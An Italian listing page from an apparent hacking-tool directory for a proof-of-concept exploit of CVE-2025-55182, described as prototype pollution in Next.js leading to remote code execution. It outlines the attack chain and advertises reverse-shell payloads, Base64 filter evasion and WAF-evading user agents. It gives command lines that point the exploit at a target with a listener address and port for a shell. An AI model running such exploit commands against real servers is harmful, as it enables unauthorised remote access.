Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182 — PoC per CVE-2025-55182 | Kitploit
Strumenti/GitHubGitHub/0xn7y/cve-2025-55182
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHub0xn7y/cve-2025-55182

CVE-2025-55182

PoC per CVE-2025-55182

Vedi Repository
9 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 Next.js Prototype Pollution

CVE-2025-55182 è una critica vulnerabilità di prototype pollution in nextjs che permette rce attraverso una sanitizzazione impropria degli input nel meccanismo di gestione delle richieste del framework; tutto ciò accade perché nextjs si fida degli oggetti JSON come un novellino sprovveduto

POC

1) Prototype Pollution nell'Analisi delle Richieste: nextjs sanifica impropriamente oggetti che possono inquinare la catena dei prototipi

2) Insecure Deserialization: il framework permette a oggetti JSON di modificare i prototipi degli oggetti base

3) rce tramite child_process inquinando la catena dei prototipi: una volta inquinato il prototipo, possiamo dirottare la logica e far eseguire cose al server

SetUp

npm create [email protected] vuln

Funzionalità Principali dell'Exploit

1) Payload di Reverse Shell: Linux/Win rev shell
2) Codifica Base64 per aggirare i filtri
3) Rilevamento automatico del sistema operativo
4) User agent casuali per eludere i WAF
5) Cicli di retry in caso di fallimento per tentativi con backoff esponenziale
6) Multi-threading per tentativi di exploit concorrenti per affidabilità

Con codifica Base64 (evasione)

python exp_v2.py target 192.168.1.69 9001 --base64

Modalità aggressiva con retry

python exploit.py target 192.168.1.69 9001 --retries 5 --threads 3

Disabilita user agent casuale

python exploit.py target.com 192.168.1.69 9001 --no-spoof
Scarica lo strumento